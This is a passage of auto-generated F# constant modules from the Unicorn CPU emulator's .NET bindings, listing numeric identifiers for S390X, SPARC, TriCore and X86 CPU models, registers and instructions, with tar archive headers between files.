= 23 let UC_S390X_REG_F7 = 24 let UC_S390X_REG_F8 = 25 let UC_S390X_REG_F9 = 26 let UC_S390X_REG_F10 = 27 let UC_S390X_REG_F11 = 28 let UC_S390X_REG_F12 = 29 let UC_S390X_REG_F13 = 30 let UC_S390X_REG_F14 = 31 let UC_S390X_REG_F15 = 32 let UC_S390X_REG_F16 = 33 let UC_S390X_REG_F17 = 34 let UC_S390X_REG_F18 = 35 let UC_S390X_REG_F19 = 36 let UC_S390X_REG_F20 = 37 let UC_S390X_REG_F21 = 38 let UC_S390X_REG_F22 = 39 let UC_S390X_REG_F23 = 40 let UC_S390X_REG_F24 = 41 let UC_S390X_REG_F25 = 42 let UC_S390X_REG_F26 = 43 let UC_S390X_REG_F27 = 44 let UC_S390X_REG_F28 = 45 let UC_S390X_REG_F29 = 46 let UC_S390X_REG_F30 = 47 let UC_S390X_REG_F31 = 48 // Access registers let UC_S390X_REG_A0 = 49 let UC_S390X_REG_A1 = 50 let UC_S390X_REG_A2 = 51 let UC_S390X_REG_A3 = 52 let UC_S390X_REG_A4 = 53 let UC_S390X_REG_A5 = 54 let UC_S390X_REG_A6 = 55 let UC_S390X_REG_A7 = 56 let UC_S390X_REG_A8 = 57 let UC_S390X_REG_A9 = 58 let UC_S390X_REG_A10 = 59 let UC_S390X_REG_A11 = 60 let UC_S390X_REG_A12 = 61 let UC_S390X_REG_A13 = 62 let UC_S390X_REG_A14 = 63 let UC_S390X_REG_A15 = 64 let UC_S390X_REG_PC = 65 let UC_S390X_REG_PSWM = 66 let UC_S390X_REG_ENDING = 67 // Alias registers unicorn-2.1.1/bindings/dotnet/UnicornEngine/Const/Sparc.fs000066400000000000000000000103011467524106700235240ustar00rootroot00000000000000// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT namespace UnicornEngine.Const open System [] module Sparc = // SPARC32 CPU let UC_CPU_SPARC32_FUJITSU_MB86904 = 0 let UC_CPU_SPARC32_FUJITSU_MB86907 = 1 let UC_CPU_SPARC32_TI_MICROSPARC_I = 2 let UC_CPU_SPARC32_TI_MICROSPARC_II = 3 let UC_CPU_SPARC32_TI_MICROSPARC_IIEP = 4 let UC_CPU_SPARC32_TI_SUPERSPARC_40 = 5 let UC_CPU_SPARC32_TI_SUPERSPARC_50 = 6 let UC_CPU_SPARC32_TI_SUPERSPARC_51 = 7 let UC_CPU_SPARC32_TI_SUPERSPARC_60 = 8 let UC_CPU_SPARC32_TI_SUPERSPARC_61 = 9 let UC_CPU_SPARC32_TI_SUPERSPARC_II = 10 let UC_CPU_SPARC32_LEON2 = 11 let UC_CPU_SPARC32_LEON3 = 12 let UC_CPU_SPARC32_ENDING = 13 // SPARC64 CPU let UC_CPU_SPARC64_FUJITSU = 0 let UC_CPU_SPARC64_FUJITSU_III = 1 let UC_CPU_SPARC64_FUJITSU_IV = 2 let UC_CPU_SPARC64_FUJITSU_V = 3 let UC_CPU_SPARC64_TI_ULTRASPARC_I = 4 let UC_CPU_SPARC64_TI_ULTRASPARC_II = 5 let UC_CPU_SPARC64_TI_ULTRASPARC_III = 6 let UC_CPU_SPARC64_TI_ULTRASPARC_IIE = 7 let UC_CPU_SPARC64_SUN_ULTRASPARC_III = 8 let UC_CPU_SPARC64_SUN_ULTRASPARC_III_CU = 9 let UC_CPU_SPARC64_SUN_ULTRASPARC_IIII = 10 let UC_CPU_SPARC64_SUN_ULTRASPARC_IV = 11 let UC_CPU_SPARC64_SUN_ULTRASPARC_IV_PLUS = 12 let UC_CPU_SPARC64_SUN_ULTRASPARC_IIII_PLUS = 13 let UC_CPU_SPARC64_SUN_ULTRASPARC_T1 = 14 let UC_CPU_SPARC64_SUN_ULTRASPARC_T2 = 15 let UC_CPU_SPARC64_NEC_ULTRASPARC_I = 16 let UC_CPU_SPARC64_ENDING = 17 // SPARC registers let UC_SPARC_REG_INVALID = 0 let UC_SPARC_REG_F0 = 1 let UC_SPARC_REG_F1 = 2 let UC_SPARC_REG_F2 = 3 let UC_SPARC_REG_F3 = 4 let UC_SPARC_REG_F4 = 5 let UC_SPARC_REG_F5 = 6 let UC_SPARC_REG_F6 = 7 let UC_SPARC_REG_F7 = 8 let UC_SPARC_REG_F8 = 9 let UC_SPARC_REG_F9 = 10 let UC_SPARC_REG_F10 = 11 let UC_SPARC_REG_F11 = 12 let UC_SPARC_REG_F12 = 13 let UC_SPARC_REG_F13 = 14 let UC_SPARC_REG_F14 = 15 let UC_SPARC_REG_F15 = 16 let UC_SPARC_REG_F16 = 17 let UC_SPARC_REG_F17 = 18 let UC_SPARC_REG_F18 = 19 let UC_SPARC_REG_F19 = 20 let UC_SPARC_REG_F20 = 21 let UC_SPARC_REG_F21 = 22 let UC_SPARC_REG_F22 = 23 let UC_SPARC_REG_F23 = 24 let UC_SPARC_REG_F24 = 25 let UC_SPARC_REG_F25 = 26 let UC_SPARC_REG_F26 = 27 let UC_SPARC_REG_F27 = 28 let UC_SPARC_REG_F28 = 29 let UC_SPARC_REG_F29 = 30 let UC_SPARC_REG_F30 = 31 let UC_SPARC_REG_F31 = 32 let UC_SPARC_REG_F32 = 33 let UC_SPARC_REG_F34 = 34 let UC_SPARC_REG_F36 = 35 let UC_SPARC_REG_F38 = 36 let UC_SPARC_REG_F40 = 37 let UC_SPARC_REG_F42 = 38 let UC_SPARC_REG_F44 = 39 let UC_SPARC_REG_F46 = 40 let UC_SPARC_REG_F48 = 41 let UC_SPARC_REG_F50 = 42 let UC_SPARC_REG_F52 = 43 let UC_SPARC_REG_F54 = 44 let UC_SPARC_REG_F56 = 45 let UC_SPARC_REG_F58 = 46 let UC_SPARC_REG_F60 = 47 let UC_SPARC_REG_F62 = 48 let UC_SPARC_REG_FCC0 = 49 let UC_SPARC_REG_FCC1 = 50 let UC_SPARC_REG_FCC2 = 51 let UC_SPARC_REG_FCC3 = 52 let UC_SPARC_REG_G0 = 53 let UC_SPARC_REG_G1 = 54 let UC_SPARC_REG_G2 = 55 let UC_SPARC_REG_G3 = 56 let UC_SPARC_REG_G4 = 57 let UC_SPARC_REG_G5 = 58 let UC_SPARC_REG_G6 = 59 let UC_SPARC_REG_G7 = 60 let UC_SPARC_REG_I0 = 61 let UC_SPARC_REG_I1 = 62 let UC_SPARC_REG_I2 = 63 let UC_SPARC_REG_I3 = 64 let UC_SPARC_REG_I4 = 65 let UC_SPARC_REG_I5 = 66 let UC_SPARC_REG_FP = 67 let UC_SPARC_REG_I7 = 68 let UC_SPARC_REG_ICC = 69 let UC_SPARC_REG_L0 = 70 let UC_SPARC_REG_L1 = 71 let UC_SPARC_REG_L2 = 72 let UC_SPARC_REG_L3 = 73 let UC_SPARC_REG_L4 = 74 let UC_SPARC_REG_L5 = 75 let UC_SPARC_REG_L6 = 76 let UC_SPARC_REG_L7 = 77 let UC_SPARC_REG_O0 = 78 let UC_SPARC_REG_O1 = 79 let UC_SPARC_REG_O2 = 80 let UC_SPARC_REG_O3 = 81 let UC_SPARC_REG_O4 = 82 let UC_SPARC_REG_O5 = 83 let UC_SPARC_REG_SP = 84 let UC_SPARC_REG_O7 = 85 let UC_SPARC_REG_Y = 86 let UC_SPARC_REG_XCC = 87 let UC_SPARC_REG_PC = 88 let UC_SPARC_REG_ENDING = 89 let UC_SPARC_REG_O6 = 84 let UC_SPARC_REG_I6 = 67 unicorn-2.1.1/bindings/dotnet/UnicornEngine/Const/TriCore.fs000066400000000000000000000077571467524106700240500ustar00rootroot00000000000000// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT namespace UnicornEngine.Const open System [] module TriCore = // TRICORE CPU let UC_CPU_TRICORE_TC1796 = 0 let UC_CPU_TRICORE_TC1797 = 1 let UC_CPU_TRICORE_TC27X = 2 let UC_CPU_TRICORE_ENDING = 3 // TRICORE registers let UC_TRICORE_REG_INVALID = 0 let UC_TRICORE_REG_A0 = 1 let UC_TRICORE_REG_A1 = 2 let UC_TRICORE_REG_A2 = 3 let UC_TRICORE_REG_A3 = 4 let UC_TRICORE_REG_A4 = 5 let UC_TRICORE_REG_A5 = 6 let UC_TRICORE_REG_A6 = 7 let UC_TRICORE_REG_A7 = 8 let UC_TRICORE_REG_A8 = 9 let UC_TRICORE_REG_A9 = 10 let UC_TRICORE_REG_A10 = 11 let UC_TRICORE_REG_A11 = 12 let UC_TRICORE_REG_A12 = 13 let UC_TRICORE_REG_A13 = 14 let UC_TRICORE_REG_A14 = 15 let UC_TRICORE_REG_A15 = 16 let UC_TRICORE_REG_D0 = 17 let UC_TRICORE_REG_D1 = 18 let UC_TRICORE_REG_D2 = 19 let UC_TRICORE_REG_D3 = 20 let UC_TRICORE_REG_D4 = 21 let UC_TRICORE_REG_D5 = 22 let UC_TRICORE_REG_D6 = 23 let UC_TRICORE_REG_D7 = 24 let UC_TRICORE_REG_D8 = 25 let UC_TRICORE_REG_D9 = 26 let UC_TRICORE_REG_D10 = 27 let UC_TRICORE_REG_D11 = 28 let UC_TRICORE_REG_D12 = 29 let UC_TRICORE_REG_D13 = 30 let UC_TRICORE_REG_D14 = 31 let UC_TRICORE_REG_D15 = 32 let UC_TRICORE_REG_PCXI = 33 let UC_TRICORE_REG_PSW = 34 let UC_TRICORE_REG_PSW_USB_C = 35 let UC_TRICORE_REG_PSW_USB_V = 36 let UC_TRICORE_REG_PSW_USB_SV = 37 let UC_TRICORE_REG_PSW_USB_AV = 38 let UC_TRICORE_REG_PSW_USB_SAV = 39 let UC_TRICORE_REG_PC = 40 let UC_TRICORE_REG_SYSCON = 41 let UC_TRICORE_REG_CPU_ID = 42 let UC_TRICORE_REG_BIV = 43 let UC_TRICORE_REG_BTV = 44 let UC_TRICORE_REG_ISP = 45 let UC_TRICORE_REG_ICR = 46 let UC_TRICORE_REG_FCX = 47 let UC_TRICORE_REG_LCX = 48 let UC_TRICORE_REG_COMPAT = 49 let UC_TRICORE_REG_DPR0_U = 50 let UC_TRICORE_REG_DPR1_U = 51 let UC_TRICORE_REG_DPR2_U = 52 let UC_TRICORE_REG_DPR3_U = 53 let UC_TRICORE_REG_DPR0_L = 54 let UC_TRICORE_REG_DPR1_L = 55 let UC_TRICORE_REG_DPR2_L = 56 let UC_TRICORE_REG_DPR3_L = 57 let UC_TRICORE_REG_CPR0_U = 58 let UC_TRICORE_REG_CPR1_U = 59 let UC_TRICORE_REG_CPR2_U = 60 let UC_TRICORE_REG_CPR3_U = 61 let UC_TRICORE_REG_CPR0_L = 62 let UC_TRICORE_REG_CPR1_L = 63 let UC_TRICORE_REG_CPR2_L = 64 let UC_TRICORE_REG_CPR3_L = 65 let UC_TRICORE_REG_DPM0 = 66 let UC_TRICORE_REG_DPM1 = 67 let UC_TRICORE_REG_DPM2 = 68 let UC_TRICORE_REG_DPM3 = 69 let UC_TRICORE_REG_CPM0 = 70 let UC_TRICORE_REG_CPM1 = 71 let UC_TRICORE_REG_CPM2 = 72 let UC_TRICORE_REG_CPM3 = 73 let UC_TRICORE_REG_MMU_CON = 74 let UC_TRICORE_REG_MMU_ASI = 75 let UC_TRICORE_REG_MMU_TVA = 76 let UC_TRICORE_REG_MMU_TPA = 77 let UC_TRICORE_REG_MMU_TPX = 78 let UC_TRICORE_REG_MMU_TFA = 79 let UC_TRICORE_REG_BMACON = 80 let UC_TRICORE_REG_SMACON = 81 let UC_TRICORE_REG_DIEAR = 82 let UC_TRICORE_REG_DIETR = 83 let UC_TRICORE_REG_CCDIER = 84 let UC_TRICORE_REG_MIECON = 85 let UC_TRICORE_REG_PIEAR = 86 let UC_TRICORE_REG_PIETR = 87 let UC_TRICORE_REG_CCPIER = 88 let UC_TRICORE_REG_DBGSR = 89 let UC_TRICORE_REG_EXEVT = 90 let UC_TRICORE_REG_CREVT = 91 let UC_TRICORE_REG_SWEVT = 92 let UC_TRICORE_REG_TR0EVT = 93 let UC_TRICORE_REG_TR1EVT = 94 let UC_TRICORE_REG_DMS = 95 let UC_TRICORE_REG_DCX = 96 let UC_TRICORE_REG_DBGTCR = 97 let UC_TRICORE_REG_CCTRL = 98 let UC_TRICORE_REG_CCNT = 99 let UC_TRICORE_REG_ICNT = 100 let UC_TRICORE_REG_M1CNT = 101 let UC_TRICORE_REG_M2CNT = 102 let UC_TRICORE_REG_M3CNT = 103 let UC_TRICORE_REG_ENDING = 104 let UC_TRICORE_REG_GA0 = 1 let UC_TRICORE_REG_GA1 = 2 let UC_TRICORE_REG_GA8 = 9 let UC_TRICORE_REG_GA9 = 10 let UC_TRICORE_REG_SP = 11 let UC_TRICORE_REG_LR = 12 let UC_TRICORE_REG_IA = 16 let UC_TRICORE_REG_ID = 32 unicorn-2.1.1/bindings/dotnet/UnicornEngine/Const/X86.fs000066400000000000000000001474021467524106700230560ustar00rootroot00000000000000// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT namespace UnicornEngine.Const open System [] module X86 = // X86 CPU let UC_CPU_X86_QEMU64 = 0 let UC_CPU_X86_PHENOM = 1 let UC_CPU_X86_CORE2DUO = 2 let UC_CPU_X86_KVM64 = 3 let UC_CPU_X86_QEMU32 = 4 let UC_CPU_X86_KVM32 = 5 let UC_CPU_X86_COREDUO = 6 let UC_CPU_X86_486 = 7 let UC_CPU_X86_PENTIUM = 8 let UC_CPU_X86_PENTIUM2 = 9 let UC_CPU_X86_PENTIUM3 = 10 let UC_CPU_X86_ATHLON = 11 let UC_CPU_X86_N270 = 12 let UC_CPU_X86_CONROE = 13 let UC_CPU_X86_PENRYN = 14 let UC_CPU_X86_NEHALEM = 15 let UC_CPU_X86_WESTMERE = 16 let UC_CPU_X86_SANDYBRIDGE = 17 let UC_CPU_X86_IVYBRIDGE = 18 let UC_CPU_X86_HASWELL = 19 let UC_CPU_X86_BROADWELL = 20 let UC_CPU_X86_SKYLAKE_CLIENT = 21 let UC_CPU_X86_SKYLAKE_SERVER = 22 let UC_CPU_X86_CASCADELAKE_SERVER = 23 let UC_CPU_X86_COOPERLAKE = 24 let UC_CPU_X86_ICELAKE_CLIENT = 25 let UC_CPU_X86_ICELAKE_SERVER = 26 let UC_CPU_X86_DENVERTON = 27 let UC_CPU_X86_SNOWRIDGE = 28 let UC_CPU_X86_KNIGHTSMILL = 29 let UC_CPU_X86_OPTERON_G1 = 30 let UC_CPU_X86_OPTERON_G2 = 31 let UC_CPU_X86_OPTERON_G3 = 32 let UC_CPU_X86_OPTERON_G4 = 33 let UC_CPU_X86_OPTERON_G5 = 34 let UC_CPU_X86_EPYC = 35 let UC_CPU_X86_DHYANA = 36 let UC_CPU_X86_EPYC_ROME = 37 let UC_CPU_X86_ENDING = 38 // X86 registers let UC_X86_REG_INVALID = 0 let UC_X86_REG_AH = 1 let UC_X86_REG_AL = 2 let UC_X86_REG_AX = 3 let UC_X86_REG_BH = 4 let UC_X86_REG_BL = 5 let UC_X86_REG_BP = 6 let UC_X86_REG_BPL = 7 let UC_X86_REG_BX = 8 let UC_X86_REG_CH = 9 let UC_X86_REG_CL = 10 let UC_X86_REG_CS = 11 let UC_X86_REG_CX = 12 let UC_X86_REG_DH = 13 let UC_X86_REG_DI = 14 let UC_X86_REG_DIL = 15 let UC_X86_REG_DL = 16 let UC_X86_REG_DS = 17 let UC_X86_REG_DX = 18 let UC_X86_REG_EAX = 19 let UC_X86_REG_EBP = 20 let UC_X86_REG_EBX = 21 let UC_X86_REG_ECX = 22 let UC_X86_REG_EDI = 23 let UC_X86_REG_EDX = 24 let UC_X86_REG_EFLAGS = 25 let UC_X86_REG_EIP = 26 let UC_X86_REG_ES = 28 let UC_X86_REG_ESI = 29 let UC_X86_REG_ESP = 30 let UC_X86_REG_FPSW = 31 let UC_X86_REG_FS = 32 let UC_X86_REG_GS = 33 let UC_X86_REG_IP = 34 let UC_X86_REG_RAX = 35 let UC_X86_REG_RBP = 36 let UC_X86_REG_RBX = 37 let UC_X86_REG_RCX = 38 let UC_X86_REG_RDI = 39 let UC_X86_REG_RDX = 40 let UC_X86_REG_RIP = 41 let UC_X86_REG_RSI = 43 let UC_X86_REG_RSP = 44 let UC_X86_REG_SI = 45 let UC_X86_REG_SIL = 46 let UC_X86_REG_SP = 47 let UC_X86_REG_SPL = 48 let UC_X86_REG_SS = 49 let UC_X86_REG_CR0 = 50 let UC_X86_REG_CR1 = 51 let UC_X86_REG_CR2 = 52 let UC_X86_REG_CR3 = 53 let UC_X86_REG_CR4 = 54 let UC_X86_REG_CR8 = 58 let UC_X86_REG_DR0 = 66 let UC_X86_REG_DR1 = 67 let UC_X86_REG_DR2 = 68 let UC_X86_REG_DR3 = 69 let UC_X86_REG_DR4 = 70 let UC_X86_REG_DR5 = 71 let UC_X86_REG_DR6 = 72 let UC_X86_REG_DR7 = 73 let UC_X86_REG_FP0 = 82 let UC_X86_REG_FP1 = 83 let UC_X86_REG_FP2 = 84 let UC_X86_REG_FP3 = 85 let UC_X86_REG_FP4 = 86 let UC_X86_REG_FP5 = 87 let UC_X86_REG_FP6 = 88 let UC_X86_REG_FP7 = 89 let UC_X86_REG_K0 = 90 let UC_X86_REG_K1 = 91 let UC_X86_REG_K2 = 92 let UC_X86_REG_K3 = 93 let UC_X86_REG_K4 = 94 let UC_X86_REG_K5 = 95 let UC_X86_REG_K6 = 96 let UC_X86_REG_K7 = 97 let UC_X86_REG_MM0 = 98 let UC_X86_REG_MM1 = 99 let UC_X86_REG_MM2 = 100 let UC_X86_REG_MM3 = 101 let UC_X86_REG_MM4 = 102 let UC_X86_REG_MM5 = 103 let UC_X86_REG_MM6 = 104 let UC_X86_REG_MM7 = 105 let UC_X86_REG_R8 = 106 let UC_X86_REG_R9 = 107 let UC_X86_REG_R10 = 108 let UC_X86_REG_R11 = 109 let UC_X86_REG_R12 = 110 let UC_X86_REG_R13 = 111 let UC_X86_REG_R14 = 112 let UC_X86_REG_R15 = 113 let UC_X86_REG_ST0 = 114 let UC_X86_REG_ST1 = 115 let UC_X86_REG_ST2 = 116 let UC_X86_REG_ST3 = 117 let UC_X86_REG_ST4 = 118 let UC_X86_REG_ST5 = 119 let UC_X86_REG_ST6 = 120 let UC_X86_REG_ST7 = 121 let UC_X86_REG_XMM0 = 122 let UC_X86_REG_XMM1 = 123 let UC_X86_REG_XMM2 = 124 let UC_X86_REG_XMM3 = 125 let UC_X86_REG_XMM4 = 126 let UC_X86_REG_XMM5 = 127 let UC_X86_REG_XMM6 = 128 let UC_X86_REG_XMM7 = 129 let UC_X86_REG_XMM8 = 130 let UC_X86_REG_XMM9 = 131 let UC_X86_REG_XMM10 = 132 let UC_X86_REG_XMM11 = 133 let UC_X86_REG_XMM12 = 134 let UC_X86_REG_XMM13 = 135 let UC_X86_REG_XMM14 = 136 let UC_X86_REG_XMM15 = 137 let UC_X86_REG_XMM16 = 138 let UC_X86_REG_XMM17 = 139 let UC_X86_REG_XMM18 = 140 let UC_X86_REG_XMM19 = 141 let UC_X86_REG_XMM20 = 142 let UC_X86_REG_XMM21 = 143 let UC_X86_REG_XMM22 = 144 let UC_X86_REG_XMM23 = 145 let UC_X86_REG_XMM24 = 146 let UC_X86_REG_XMM25 = 147 let UC_X86_REG_XMM26 = 148 let UC_X86_REG_XMM27 = 149 let UC_X86_REG_XMM28 = 150 let UC_X86_REG_XMM29 = 151 let UC_X86_REG_XMM30 = 152 let UC_X86_REG_XMM31 = 153 let UC_X86_REG_YMM0 = 154 let UC_X86_REG_YMM1 = 155 let UC_X86_REG_YMM2 = 156 let UC_X86_REG_YMM3 = 157 let UC_X86_REG_YMM4 = 158 let UC_X86_REG_YMM5 = 159 let UC_X86_REG_YMM6 = 160 let UC_X86_REG_YMM7 = 161 let UC_X86_REG_YMM8 = 162 let UC_X86_REG_YMM9 = 163 let UC_X86_REG_YMM10 = 164 let UC_X86_REG_YMM11 = 165 let UC_X86_REG_YMM12 = 166 let UC_X86_REG_YMM13 = 167 let UC_X86_REG_YMM14 = 168 let UC_X86_REG_YMM15 = 169 let UC_X86_REG_YMM16 = 170 let UC_X86_REG_YMM17 = 171 let UC_X86_REG_YMM18 = 172 let UC_X86_REG_YMM19 = 173 let UC_X86_REG_YMM20 = 174 let UC_X86_REG_YMM21 = 175 let UC_X86_REG_YMM22 = 176 let UC_X86_REG_YMM23 = 177 let UC_X86_REG_YMM24 = 178 let UC_X86_REG_YMM25 = 179 let UC_X86_REG_YMM26 = 180 let UC_X86_REG_YMM27 = 181 let UC_X86_REG_YMM28 = 182 let UC_X86_REG_YMM29 = 183 let UC_X86_REG_YMM30 = 184 let UC_X86_REG_YMM31 = 185 let UC_X86_REG_ZMM0 = 186 let UC_X86_REG_ZMM1 = 187 let UC_X86_REG_ZMM2 = 188 let UC_X86_REG_ZMM3 = 189 let UC_X86_REG_ZMM4 = 190 let UC_X86_REG_ZMM5 = 191 let UC_X86_REG_ZMM6 = 192 let UC_X86_REG_ZMM7 = 193 let UC_X86_REG_ZMM8 = 194 let UC_X86_REG_ZMM9 = 195 let UC_X86_REG_ZMM10 = 196 let UC_X86_REG_ZMM11 = 197 let UC_X86_REG_ZMM12 = 198 let UC_X86_REG_ZMM13 = 199 let UC_X86_REG_ZMM14 = 200 let UC_X86_REG_ZMM15 = 201 let UC_X86_REG_ZMM16 = 202 let UC_X86_REG_ZMM17 = 203 let UC_X86_REG_ZMM18 = 204 let UC_X86_REG_ZMM19 = 205 let UC_X86_REG_ZMM20 = 206 let UC_X86_REG_ZMM21 = 207 let UC_X86_REG_ZMM22 = 208 let UC_X86_REG_ZMM23 = 209 let UC_X86_REG_ZMM24 = 210 let UC_X86_REG_ZMM25 = 211 let UC_X86_REG_ZMM26 = 212 let UC_X86_REG_ZMM27 = 213 let UC_X86_REG_ZMM28 = 214 let UC_X86_REG_ZMM29 = 215 let UC_X86_REG_ZMM30 = 216 let UC_X86_REG_ZMM31 = 217 let UC_X86_REG_R8B = 218 let UC_X86_REG_R9B = 219 let UC_X86_REG_R10B = 220 let UC_X86_REG_R11B = 221 let UC_X86_REG_R12B = 222 let UC_X86_REG_R13B = 223 let UC_X86_REG_R14B = 224 let UC_X86_REG_R15B = 225 let UC_X86_REG_R8D = 226 let UC_X86_REG_R9D = 227 let UC_X86_REG_R10D = 228 let UC_X86_REG_R11D = 229 let UC_X86_REG_R12D = 230 let UC_X86_REG_R13D = 231 let UC_X86_REG_R14D = 232 let UC_X86_REG_R15D = 233 let UC_X86_REG_R8W = 234 let UC_X86_REG_R9W = 235 let UC_X86_REG_R10W = 236 let UC_X86_REG_R11W = 237 let UC_X86_REG_R12W = 238 let UC_X86_REG_R13W = 239 let UC_X86_REG_R14W = 240 let UC_X86_REG_R15W = 241 let UC_X86_REG_IDTR = 242 let UC_X86_REG_GDTR = 243 let UC_X86_REG_LDTR = 244 let UC_X86_REG_TR = 245 let UC_X86_REG_FPCW = 246 let UC_X86_REG_FPTAG = 247 let UC_X86_REG_MSR = 248 let UC_X86_REG_MXCSR = 249 let UC_X86_REG_FS_BASE = 250 let UC_X86_REG_GS_BASE = 251 let UC_X86_REG_FLAGS = 252 let UC_X86_REG_RFLAGS = 253 let UC_X86_REG_FIP = 254 let UC_X86_REG_FCS = 255 let UC_X86_REG_FDP = 256 let UC_X86_REG_FDS = 257 let UC_X86_REG_FOP = 258 let UC_X86_REG_ENDING = 259 // X86 instructions let UC_X86_INS_INVALID = 0 let UC_X86_INS_AAA = 1 let UC_X86_INS_AAD = 2 let UC_X86_INS_AAM = 3 let UC_X86_INS_AAS = 4 let UC_X86_INS_FABS = 5 let UC_X86_INS_ADC = 6 let UC_X86_INS_ADCX = 7 let UC_X86_INS_ADD = 8 let UC_X86_INS_ADDPD = 9 let UC_X86_INS_ADDPS = 10 let UC_X86_INS_ADDSD = 11 let UC_X86_INS_ADDSS = 12 let UC_X86_INS_ADDSUBPD = 13 let UC_X86_INS_ADDSUBPS = 14 let UC_X86_INS_FADD = 15 let UC_X86_INS_FIADD = 16 let UC_X86_INS_FADDP = 17 let UC_X86_INS_ADOX = 18 let UC_X86_INS_AESDECLAST = 19 let UC_X86_INS_AESDEC = 20 let UC_X86_INS_AESENCLAST = 21 let UC_X86_INS_AESENC = 22 let UC_X86_INS_AESIMC = 23 let UC_X86_INS_AESKEYGENASSIST = 24 let UC_X86_INS_AND = 25 let UC_X86_INS_ANDN = 26 let UC_X86_INS_ANDNPD = 27 let UC_X86_INS_ANDNPS = 28 let UC_X86_INS_ANDPD = 29 let UC_X86_INS_ANDPS = 30 let UC_X86_INS_ARPL = 31 let UC_X86_INS_BEXTR = 32 let UC_X86_INS_BLCFILL = 33 let UC_X86_INS_BLCI = 34 let UC_X86_INS_BLCIC = 35 let UC_X86_INS_BLCMSK = 36 let UC_X86_INS_BLCS = 37 let UC_X86_INS_BLENDPD = 38 let UC_X86_INS_BLENDPS = 39 let UC_X86_INS_BLENDVPD = 40 let UC_X86_INS_BLENDVPS = 41 let UC_X86_INS_BLSFILL = 42 let UC_X86_INS_BLSI = 43 let UC_X86_INS_BLSIC = 44 let UC_X86_INS_BLSMSK = 45 let UC_X86_INS_BLSR = 46 let UC_X86_INS_BOUND = 47 let UC_X86_INS_BSF = 48 let UC_X86_INS_BSR = 49 let UC_X86_INS_BSWAP = 50 let UC_X86_INS_BT = 51 let UC_X86_INS_BTC = 52 let UC_X86_INS_BTR = 53 let UC_X86_INS_BTS = 54 let UC_X86_INS_BZHI = 55 let UC_X86_INS_CALL = 56 let UC_X86_INS_CBW = 57 let UC_X86_INS_CDQ = 58 let UC_X86_INS_CDQE = 59 let UC_X86_INS_FCHS = 60 let UC_X86_INS_CLAC = 61 let UC_X86_INS_CLC = 62 let UC_X86_INS_CLD = 63 let UC_X86_INS_CLFLUSH = 64 let UC_X86_INS_CLFLUSHOPT = 65 let UC_X86_INS_CLGI = 66 let UC_X86_INS_CLI = 67 let UC_X86_INS_CLTS = 68 let UC_X86_INS_CLWB = 69 let UC_X86_INS_CMC = 70 let UC_X86_INS_CMOVA = 71 let UC_X86_INS_CMOVAE = 72 let UC_X86_INS_CMOVB = 73 let UC_X86_INS_CMOVBE = 74 let UC_X86_INS_FCMOVBE = 75 let UC_X86_INS_FCMOVB = 76 let UC_X86_INS_CMOVE = 77 let UC_X86_INS_FCMOVE = 78 let UC_X86_INS_CMOVG = 79 let UC_X86_INS_CMOVGE = 80 let UC_X86_INS_CMOVL = 81 let UC_X86_INS_CMOVLE = 82 let UC_X86_INS_FCMOVNBE = 83 let UC_X86_INS_FCMOVNB = 84 let UC_X86_INS_CMOVNE = 85 let UC_X86_INS_FCMOVNE = 86 let UC_X86_INS_CMOVNO = 87 let UC_X86_INS_CMOVNP = 88 let UC_X86_INS_FCMOVNU = 89 let UC_X86_INS_CMOVNS = 90 let UC_X86_INS_CMOVO = 91 let UC_X86_INS_CMOVP = 92 let UC_X86_INS_FCMOVU = 93 let UC_X86_INS_CMOVS = 94 let UC_X86_INS_CMP = 95 let UC_X86_INS_CMPPD = 96 let UC_X86_INS_CMPPS = 97 let UC_X86_INS_CMPSB = 98 let UC_X86_INS_CMPSD = 99 let UC_X86_INS_CMPSQ = 100 let UC_X86_INS_CMPSS = 101 let UC_X86_INS_CMPSW = 102 let UC_X86_INS_CMPXCHG16B = 103 let UC_X86_INS_CMPXCHG = 104 let UC_X86_INS_CMPXCHG8B = 105 let UC_X86_INS_COMISD = 106 let UC_X86_INS_COMISS = 107 let UC_X86_INS_FCOMP = 108 let UC_X86_INS_FCOMPI = 109 let UC_X86_INS_FCOMI = 110 let UC_X86_INS_FCOM = 111 let UC_X86_INS_FCOS = 112 let UC_X86_INS_CPUID = 113 let UC_X86_INS_CQO = 114 let UC_X86_INS_CRC32 = 115 let UC_X86_INS_CVTDQ2PD = 116 let UC_X86_INS_CVTDQ2PS = 117 let UC_X86_INS_CVTPD2DQ = 118 let UC_X86_INS_CVTPD2PS = 119 let UC_X86_INS_CVTPS2DQ = 120 let UC_X86_INS_CVTPS2PD = 121 let UC_X86_INS_CVTSD2SI = 122 let UC_X86_INS_CVTSD2SS = 123 let UC_X86_INS_CVTSI2SD = 124 let UC_X86_INS_CVTSI2SS = 125 let UC_X86_INS_CVTSS2SD = 126 let UC_X86_INS_CVTSS2SI = 127 let UC_X86_INS_CVTTPD2DQ = 128 let UC_X86_INS_CVTTPS2DQ = 129 let UC_X86_INS_CVTTSD2SI = 130 let UC_X86_INS_CVTTSS2SI = 131 let UC_X86_INS_CWD = 132 let UC_X86_INS_CWDE = 133 let UC_X86_INS_DAA = 134 let UC_X86_INS_DAS = 135 let UC_X86_INS_DATA16 = 136 let UC_X86_INS_DEC = 137 let UC_X86_INS_DIV = 138 let UC_X86_INS_DIVPD = 139 let UC_X86_INS_DIVPS = 140 let UC_X86_INS_FDIVR = 141 let UC_X86_INS_FIDIVR = 142 let UC_X86_INS_FDIVRP = 143 let UC_X86_INS_DIVSD = 144 let UC_X86_INS_DIVSS = 145 let UC_X86_INS_FDIV = 146 let UC_X86_INS_FIDIV = 147 let UC_X86_INS_FDIVP = 148 let UC_X86_INS_DPPD = 149 let UC_X86_INS_DPPS = 150 let UC_X86_INS_RET = 151 let UC_X86_INS_ENCLS = 152 let UC_X86_INS_ENCLU = 153 let UC_X86_INS_ENTER = 154 let UC_X86_INS_EXTRACTPS = 155 let UC_X86_INS_EXTRQ = 156 let UC_X86_INS_F2XM1 = 157 let UC_X86_INS_LCALL = 158 let UC_X86_INS_LJMP = 159 let UC_X86_INS_FBLD = 160 let UC_X86_INS_FBSTP = 161 let UC_X86_INS_FCOMPP = 162 let UC_X86_INS_FDECSTP = 163 let UC_X86_INS_FEMMS = 164 let UC_X86_INS_FFREE = 165 let UC_X86_INS_FICOM = 166 let UC_X86_INS_FICOMP = 167 let UC_X86_INS_FINCSTP = 168 let UC_X86_INS_FLDCW = 169 let UC_X86_INS_FLDENV = 170 let 